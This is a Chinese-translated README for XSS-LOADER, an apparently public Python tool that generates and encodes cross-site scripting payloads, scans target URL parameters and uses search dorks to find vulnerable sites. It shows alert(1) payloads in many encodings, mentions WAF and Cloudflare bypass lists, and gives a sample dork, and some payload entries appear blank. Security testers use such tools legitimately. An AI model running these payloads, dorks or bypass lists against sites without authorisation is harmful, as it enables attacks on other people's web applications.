capture0x/XSS-LOADER

GitHub: capture0x/XSS-LOADER

集 XSS 载荷生成、漏洞扫描与 Dork 搜索于一体的 Python 轻量级跨站脚本安全测试工具。

Stars: 604 | Forks: 122

# :gem:   XSS-LOADER 工具   :gem: #### 作者:TMRSWRR #### 版本 1.0.0 集 **XSS PAYLOAD GENERATOR(载荷生成器)- XSS SCANNER(扫描器)- XSS DORK FINDER(Dork 查找器)** 于一体的工具 Instagram: [TMRSWRR](https://www.instagram.com/tmrswrr/) ## :camera: 截图 :camera: ## 👇 :love_letter: 如何使用 :love_letter: 👇 [![如何使用](https://i.imgur.com/l44jOXW.png)](https://www.youtube.com/watch?v=ys_a5yx1hmY) ## 📒 读我 📒 * 此工具用于创建 XSS 注入所使用的载荷(Payload) * 从参数中选择默认载荷标签或编写您自己的载荷 * 可通过 Xss Scanner 参数执行 XSS 注入 * 可通过 Xss Dork Finder 参数查找存在漏洞的网站 URL ## :cd: 安装 :cd: ### 通过 requirements.txt 安装 ``` git clone https://github.com/capture0x/XSS-LOADER/ cd XSS-LOADER pip3 install -r requirements.txt ``` ## 使用方法 ``` python3 payloader.py ``` ## 🗃️ 功能 🗃️ #### *Basic Payload(基础载荷) 设置默认参数为:`````` #### *Div Payload(Div 载荷) 设置默认参数为:```
MOVE HERE``` #### *Body Payload(Body 载荷) 设置默认参数为:`````` #### *Svg Payload(Svg 载荷) 设置默认参数为:`````` #### *Enter Your Payload(输入您的载荷) 对用户编写的载荷进行编码 #### *Payload Generator Parameter(载荷生成器参数) 对选定标签的载荷进行编码 # ``` * | 1. UPPER CASE----> * | 2. UPPER AND LOWER CASE----> * | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E * | 4. HTML ENTITY ENCODE-----> <script>alert(1)</script> * | 5. SPLIT PAYLOAD -----> pt>>alert(1)pt>> * | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e * | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format. * | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format. * | 9. DELETE TAG -----> ";alert('XSS');// * | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e * | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾ * | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== * | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4- * | 14. PARENTHESIS BYPASS -----> * | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE * | 16. TAG BLOCK BREAKOUT-----> "> * | 17. SCRIPT BREAKOUT-----> * | 18. FILE UPLOAD PAYLOAD-----> ">.gif * | 19. INSIDE COMMENTS BYPASS-----> --> * | 20. MUTATION PAYLOAD----->

* | 21. MALFORMED IMG-----> "> * | 22. SPACE BYPASS-----> * | 23. DOWNLEVEL-HIDDEN BLOCK-----> * | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List * | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload List * | 26. POLYGLOT PAYLOADS-----> Show Polyglot Bypass Payload List * | 27. ALERT PAYLOADS-----> Show Alert Payload List * | 28. ALL CREATE PAYLOAD-----> Show Create All Payloads * | 29. GO BACK MAIN MENU * | 30. EXIT ``` #### *Xss Scanner(Xss 扫描器) 首先您需要输入目标的 URL 请按照以下示例输入 URL ==> 例如 target -----> http://target.com/index.php?name= 选择用于扫描的载荷列表 * BASIC PAYLOAD LIST ==> 由 script 标签组成的载荷列表 * DIV PAYLOAD LIST ==> 由 div 标签组成的载荷列表 * IMG PAYLOAD LIST ==> 由 img 标签组成的载荷列表 * BODY PAYLOAD LIST ==> 由 body 标签组成的载荷列表 * SVG PAYLOAD LIST ==> 由 svg 标签组成的载荷列表 * MIXED PAYLOAD LIST ==> 包含所有标签的载荷列表 * ENTER FILE PATH ==> 由用户自定义的载荷列表,请按照以下示例输入路径..! (例如 path -----> /usr/share/wordlists/wfuzz/Injections/XSS.txt) 扫描完成后,结果将保存在 "vulnpayload.txt" 中。 #### *Xss Dork Finder(Xss Dork 查找器) 首先输入用于搜索的 Dork: 例如---->inurl:"search.php?q=" 扫描完成后,结果将保存在 "dork.txt" 中。 ## 已知问题 ### 已修复: - Unicode 错误 - 模块错误 **重要提示:** 如果您想在安装了 Python3 的 Windows 系统上使用此工具,请通过以下链接下载: https://github.com/capture0x/XSS-LOADER-for-WINDOWS ## 错误与改进 如需报告错误或提出改进建议,请在此处提交一个 [issue](https://github.com/capture0x/XSS-LOADER/issues)。 **版权所有 2020**

标签:CISA项目, Dork搜索, Payload生成器, Python, SEO, Web安全, XSS, 加密, 安全测试, 攻击性安全, 攻击路径可视化, 无后门, 混淆, 漏洞情报, 漏洞扫描器, 编码器, 蓝队分析, 跨站脚本攻击, 黑客工具